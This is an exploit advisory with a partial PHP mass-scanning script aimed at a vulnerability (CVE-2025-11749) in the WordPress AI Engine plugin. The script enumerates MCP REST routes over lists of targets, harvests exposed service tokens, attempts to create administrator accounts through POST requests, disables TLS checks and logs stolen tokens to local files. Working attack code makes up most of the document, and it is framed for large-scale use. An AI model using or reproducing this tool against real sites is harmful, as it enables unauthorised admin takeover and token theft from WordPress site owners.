=============================================================================================================================================
| # Title : WordPress AI Engine 3.1.3 Mass MCP Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ai-engine/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211374/ & CVE-2025-11749
[+] Summary :
This advisory documents a fully automated PHP-based exploitation framework designed to perform mass enumeration,
plugin detection, token extraction, and automated account creation targeting vulnerable WordPress MCP-related REST API endpoints.
The tool uses randomized payload generation, disables TLS certificate verification (CURLOPT_SSL_VERIFYPEER / CURLOPT_SSL_VERIFYHOST are turned off, so responses from HTTPS targets can be forged by anyone on the network path), and integrates a dual-mode engine (CLI & HTML).
It is intended for large-scale penetration testing, vulnerability validation, and research; run it only against hosts you are authorized to test, since it actively attempts account creation and appends every harvested token in plaintext to files in the working directory (success_results.txt, tokens_only.txt).
The script allows:
Automatic POST-based admin creation attempts (in the PoC as listed, process_target() posts a username/password/email form to the target URL exactly as given in targets.txt; it does not itself select a user-creation REST route, so the route must be supplied in the target list)
Automatic detection of API routes /mcp/v1/ and /mwai/v1/
Automated token extraction
HTML Exploitation UI
Randomized payload polymorphism
Mass target input (list-based)
Logging of results to multiple output files
[+] Vulnerability Description :
Several WordPress MCP plugins expose insecure REST API endpoints under
/wp-json/mcp/v1/*
/wp-json/mwai/v1/*
[+] Some installations allow:
Unauthenticated access
Token disclosure
User creation without privilege checks
Sensitive route discovery
The tool exploits these weaknesses by programmatically interacting with the endpoints to extract tokens and perform automated admin creation attempts.
Impact
[+] A remote attacker can:
Extract valid service tokens
Register new administrator-level accounts
Access endpoints intended for privileged users
Automate exploitation across thousands of hosts
Perform further attacks using the obtained tokens
Impact Rating: Critical
[+] 3. PoC
Save the script as scan.php and add one target per line to targets.txt. Note that CLI mode passes each line to curl as-is (no http:// is prepended; only the HTML-mode helper read_targets_html() does that), then run:
php scan.php targets.txt
File Description
success_results.txt Successful token captures
tokens_only.txt Extracted tokens only
created_admins.txt Accounts created via POST exploit (no write to this file appears in the portion of the listing reproduced below; if it is produced at all, that happens in code not shown here)
-------------------------------- (the listing below is reproduced incomplete: it begins inside the curl_setopt_array() call of what appears to be send_post(); the <?php opening, banner(), generate_payload() and write_token() are referenced but not shown)
true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_USERAGENT => $user_agent,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 20,
CURLOPT_HTTPHEADER => $headers
]);
$response = curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return [$response, $info];
}
// ============================================================================
// Process Target
// ============================================================================
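/**
 * Send the account-creation POST to one target and harvest any token that
 * appears in the response body.
 *
 * Credentials come from the script-level globals $target_username,
 * $target_password and $target_email (assigned outside this listing);
 * $successFile is the path of the success log. None of them is modified here.
 *
 * NOTE: a "SUCCESS" line is logged whenever the response merely contains a
 * token-looking fragment; it does not prove that an account was created.
 *
 * @param string $url  target URL exactly as read from the target list
 * @return string|false raw response body, or false when curl_exec() failed
 */
function process_target($url) {
    global $target_username, $target_password, $target_email, $successFile;

    $payload = generate_payload();
    // $info is curl_getinfo() metadata (status code etc.); it is not used here.
    list($resp, $info) = send_post($url, [
        "username" => $target_username,
        "password" => $target_password,
        "email"    => $target_email,
        "payload"  => $payload
    ]);

    // curl_exec() yields false on a transport error; the original fed that
    // straight into preg_match(). There is nothing to harvest in that case.
    if (!is_string($resp)) {
        return $resp;
    }

    // Loose match for a `token: <value>` / `"token":"<value>"` fragment. The
    // character class bounds what is accepted as a token so arbitrary response
    // text is not written to the log as a credential.
    if (preg_match('/token[\"\:\s]+([A-Za-z0-9\.\-\_]+)/i', $resp, $m)) {
        $token = $m[1];
        write_token($url, $token);
        file_put_contents($successFile, "$url => SUCCESS | token: $token\n", FILE_APPEND);
    }
    return $resp;
}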
// ============================================================================
// Main Entry Point
// ============================================================================
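if (php_sapi_name() == "cli") {
    banner();
    // $argc/$argv are already script-scope variables in CLI mode; the
    // original `global $argc, $argv;` at file scope was a no-op and is dropped.
    if ($argc < 2) {
        die("Usage: php " . basename($argv[0]) . " targets.txt\n");
    }
    $targets_file = $argv[1];
    // is_file() rather than file_exists(): a directory would pass the old
    // check and then make file() fail below.
    if (!is_file($targets_file)) {
        die("[-] Target list not found.\n");
    }
    $targets = file($targets_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($targets === false) {
        die("[-] Target list could not be read.\n");
    }
    foreach ($targets as $t) {
        // Trailing whitespace would otherwise become part of the URL handed to
        // curl; FILE_SKIP_EMPTY_LINES only drops lines that are completely empty.
        $t = trim($t);
        if ($t === "") {
            continue;
        }
        // NOTE(review): unlike read_targets_html(), no scheme is prepended here;
        // a bare hostname is passed to curl exactly as written.
        echo "[*] Processing: $t\n";
        process_target($t);
        echo "[OK] Completed\n\n";
    }
}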
// ============================================================================
// Mass MCP Exploit (HTML Version)
// ============================================================================
/**
 * Build a random CSS rgb() colour string for the HTML banner.
 *
 * Channel ranges: red 34..85, green 49..160, blue 63..255 (inclusive).
 * Purely cosmetic, so the non-cryptographic rand() is fine here.
 *
 * @return string e.g. "rgb(40,100,200)"
 */
function rand_color() {
    $red   = rand(34, 85);
    $green = rand(49, 160);
    $blue  = rand(63, 255);
    return sprintf("rgb(%d,%d,%d)", $red, $green, $blue);
}
/**
 * Print the ASCII-art banner followed by the tool name line.
 *
 * Output is the banner literal with a newline appended (equivalent to echoing
 * each explode()d line with "\n"), then a blank line and the title line.
 */
function print_banner_html() {
    $banner = "
__ __ _ _____ _ _____ ____
| \/ | / \ | ____| | | ____| _ \
| |\/| | / _ \ | _| | | | _| | |_) |
| | | |/ ___ \| |___| |___| |___| _ <
|_| |_/_/ \_\_____|_____|_____|_| \_\
";
    // Joining the split lines back with "\n" and terminating the last one is
    // exactly the banner text plus one trailing newline.
    echo $banner, "\n";
    echo "\nMass MCP Exploit | Nxploited (Converted by Indoushka)\n";
}
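/**
 * Read the target list for HTML mode and normalise each entry to a URL.
 *
 * Lines are trimmed, blank lines skipped, and any entry without an
 * http:// or https:// scheme gets "http://" prepended.
 *
 * NOTE: the default is plain http://, so tokens harvested from such targets
 * travel unencrypted; list https:// explicitly where the target supports it.
 *
 * @param string $file  path of the target list
 * @return string[] normalised target URLs; empty when the file is missing
 *                  or unreadable
 */
function read_targets_html($file) {
    // is_file() rejects directories, which file_exists() would accept and
    // file() would then fail on with a warning.
    if (!is_file($file)) {
        return [];
    }
    $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($lines === false) {
        return [];
    }
    $out = [];
    foreach ($lines as $entry) {
        $entry = trim($entry);
        if ($entry === "") {
            continue;
        }
        if (!preg_match("#^https?://#i", $entry)) {
            $entry = "http://" . $entry;
        }
        $out[] = $entry;
    }
    return $out;
}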
/**
 * Append one line to a result file.
 *
 * @param string $file  path of the file to append to (created if absent)
 * @param string $msg   text to write; a newline is added after it
 */
function write_result_html($file, $msg) {
    $line = $msg . "\n";
    file_put_contents($file, $line, FILE_APPEND);
}
/**
 * GET a URL and decode the body as JSON.
 *
 * A randomised User-Agent is sent on every request. TLS peer verification is
 * deliberately disabled (CURLOPT_SSL_VERIFYPEER => false) so self-signed
 * targets can be scanned; the consequence is that an on-path attacker can
 * substitute any response. CURLOPT_SSL_VERIFYHOST is left at its default
 * here, unlike the POST helper earlier in the file which disables both.
 *
 * @param string $url  absolute URL to fetch
 * @return mixed decoded JSON (associative arrays), or null when the transfer
 *               failed or the body was not valid JSON
 */
function http_get_json($url) {
    $agent = sprintf("Mozilla/5.0 (Windows NT %d) AppleWebKit/%d", rand(7, 11), rand(500, 999));

    $handle = curl_init();
    curl_setopt($handle, CURLOPT_URL, $url);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($handle, CURLOPT_TIMEOUT, 10);
    curl_setopt($handle, CURLOPT_USERAGENT, $agent);
    $body = curl_exec($handle);
    curl_close($handle);

    // A failed transfer decodes to null anyway; make that explicit.
    if ($body === false) {
        return null;
    }
    return json_decode($body, true);
}
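/**
 * Check the site's REST index for routes under the MCP namespaces.
 *
 * Fetches /wp-json/ and looks for any route key starting with /mcp/v1/ or
 * /mwai/v1/. Route paths are the KEYS of the "routes" object; the values are
 * descriptor arrays and are ignored.
 *
 * @param string $url  site base URL (trailing slash optional)
 * @return bool true when at least one such route is advertised
 */
function plugin_installed($url) {
    $data = http_get_json(rtrim($url, "/") . "/wp-json/");
    // Guard the shape too: a non-array "routes" value (or a non-JSON body)
    // would otherwise trip the foreach.
    if (!isset($data["routes"]) || !is_array($data["routes"])) {
        return false;
    }
    foreach (array_keys($data["routes"]) as $route) {
        $route = (string) $route;
        if (strpos($route, "/mcp/v1/") === 0) {
            return true;
        }
        if (strpos($route, "/mwai/v1/") === 0) {
            return true;
        }
    }
    return false;
}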
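/**
 * Extract an MCP token from the /mcp/v1/ namespace index.
 *
 * The index lists route paths as the KEYS of "routes" (values are descriptor
 * arrays). A route of the form /mcp/v1/<token>/sse yields <token>. The
 * original iterated the values, so trim() received an array instead of the
 * path and nothing was ever matched.
 *
 * The token must consist of [A-Za-z0-9._-] only — the same character class
 * process_target() accepts — so a route whose middle segment is a path
 * pattern or some other non-token text is skipped rather than logged as a
 * credential.
 *
 * Side effect: the first token found is appended to tokens_only.txt.
 *
 * @param string $url  site base URL (trailing slash optional)
 * @return string|null the token, or null when none is advertised
 */
function find_token($url) {
    $data = http_get_json(rtrim($url, "/") . "/wp-json/mcp/v1/");
    if (!isset($data["routes"]) || !is_array($data["routes"])) {
        return null;
    }
    foreach (array_keys($data["routes"]) as $route) {
        $parts = explode("/", trim((string) $route, "/"));
        if (count($parts) < 4 || $parts[0] !== "mcp" || $parts[1] !== "v1" || end($parts) !== "sse") {
            continue;
        }
        $token = $parts[2];
        if ($token === "" || !preg_match('/^[A-Za-z0-9._-]+$/', $token)) {
            continue;
        }
        write_result_html("tokens_only.txt", "$url => $token");
        return $token;
    }
    return null;
}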
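/**
 * HTML-mode handler for one target: detect the plugin, then try to pull a
 * token and report the outcome.
 *
 * Everything echoed here originates either from the target list or from the
 * target's own HTTP response, and this is the HTML output path, so both are
 * HTML-escaped before printing. Otherwise a hostile "target" could return a
 * crafted route name and inject markup or script into the operator's page.
 * The result file keeps the raw values, as before.
 *
 * @param string $url  target URL
 * @return void
 */
function process_target_html($url) {
    $safeUrl = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    echo "[*] Checking: $safeUrl\n";
    if (!plugin_installed($url)) {
        echo "[x] Plugin not installed\n";
        return;
    }
    $token = find_token($url);
    // Compare against null/"" rather than truthiness so a token of "0" is not
    // silently treated as "no token".
    if ($token !== null && $token !== "") {
        $safeToken = htmlspecialchars($token, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        echo "[+] Token: $safeToken\n";
        write_result_html("success_results.txt", "$url => TOKEN: $token");
    } else {
        echo "[-] No token\n";
    }
}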
// ============================================================================
// Nxploited Worker
// ============================================================================
/**
 * Run the reachability check over every entry of a target list.
 *
 * Prints an error and returns when $targets is not an array; otherwise
 * announces each target and delegates to Nxploited_internet_check().
 *
 * @param mixed $targets  expected: array of target URLs
 * @return void
 */
function Nxploited_worker($targets) {
    if (!is_array($targets)) {
        echo "Error: targets must be array.\n";
        return;
    }
    array_walk($targets, function ($host) {
        echo "[*] Checking internet: $host\n";
        Nxploited_internet_check($host);
    });
}
/**
 * Reachability probe: GET the target with a per-request marker User-Agent
 * and print [OK] or [FAIL].
 *
 * Uses the http stream wrapper (requires allow_url_fopen) with a 5 s
 * timeout. Errors are suppressed with @ on purpose — the function reports
 * failure itself via the [FAIL] line.
 *
 * @param string $target  URL to probe
 * @return void
 */
function Nxploited_internet_check($target) {
    $marker = "Nxploited-Check-" . md5($target . microtime(true));
    $options = [
        "http" => [
            "method"  => "GET",
            "timeout" => 5,
            "header"  => "User-Agent: $marker\r\n"
        ]
    ];
    $body = @file_get_contents($target, false, stream_context_create($options));
    $report = ($body === false)
        ? "[FAIL] Unreachable: $target\n"
        : "[OK] Connection success: $target\n";
    echo $report;
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================